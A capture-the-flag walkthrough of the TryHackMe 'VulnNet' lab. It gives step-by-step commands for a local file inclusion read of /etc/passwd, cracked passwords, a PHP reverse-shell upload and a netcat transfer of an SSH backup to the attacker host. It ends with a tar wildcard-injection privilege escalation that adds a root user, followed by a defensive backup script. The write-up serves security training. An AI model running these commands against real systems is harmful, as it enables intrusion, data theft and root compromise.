Room Link: https://tryhackme.com/room/vulnnet1
Initial Scan
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Browsing the gobuster results, we can see a subdomain: broadcast.vulnnet.thm
Fuzz Subdomain
We can see broadcast again when we scan for it.
Kali
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://vulnnet.thm
LFI
One of the other JS files shows that the referer parameter can be used to read files.
Confirmed it works
Kali
curl -s 'http://vulnnet.thm/?referer=/etc/passwd'
Crack Hash
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Username: developers
Password: 9972761drmfsls
TCP/80 - HTTP
Kali
gobuster -U developers -P 9972761drmfsls dir -u broadcast.vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Initial Shell
exploit: https://www.exploit-db.com/raw/44250
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell/
curl -F "file=@php-reverse-shell.php" -F "plupload=1" -F "name=php-reverse-shell.php" http://broadcast.vulnnet.thm/actions/photo_uploader.php -u developers:9972761drmfsls
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Lateral Movement
Victim
cd /var/backups/
ls -lah
Netcat
Kali (receiving)
nc -l -p 1234 > ssh-backup.tar.gz
Victim (sending)
nc -w 3 $KALI 1234 < ssh-backup.tar.gz
Kali
tar xvf ssh-backup.tar.gz
Kali
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt
Kali
ssh -i id_rsa server-management@$VICTIM
Password: oneTWO3gOyac
Privilege Escalation
exploit: https://gtfobins.github.io/gtfobins/tar/
Victim
cd /var/opt/
cat backupsrv.sh
ls -lah backupsrv.sh
Victim
cd /home/server-management/Documents
rm -rf 'Employee Search Progress Report.pdf'
rm -rf 'Daily Job Progress Report Format.pdf'
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh
shell.sh
#!/bin/bash
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
Once the cron job runs, a new root user will be created.
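The defender's side of the tar wildcard issue used above, as an added example that is not part of the original write-up: a check for option-like file names and a backup that never globs. It assumes backupsrv.sh archives the Documents directory with a bare `*` (the script's contents are not shown on this page); all function names are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# Assumption: the root cron script archives a user-writable directory with a
# bare wildcard (tar ... *), so every file name in it becomes a tar argument.

# List entries directly inside DIR whose names start with "-".
# A bare "*" would hand these to tar as options instead of file names.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Number of such entries (0 means the directory is clean).
count_option_like_names() {
    option_like_names "$1" | wc -l | tr -d ' '
}

# Archive SRC into DEST without any shell globbing: tar is given the
# directory itself and walks it, so file names never reach its argv.
safe_backup() {
    src=$1
    dest=$2
    tar -czf "$dest" -C "$src" .
}

# Refuse to back up a directory that contains option-like names and
# report them, so the attempt is visible instead of silently archived.
checked_backup() {
    src=$1
    dest=$2
    if [ "$(count_option_like_names "$src")" -ne 0 ]; then
        echo "option-like file names in $src:" >&2
        option_like_names "$src" >&2
        return 1
    fi
    safe_backup "$src" "$dest"
}
```

If the script has to keep a glob, `tar -czf "$dest" -- ./*` avoids the same problem, because every expanded name then starts with `./` rather than `-`.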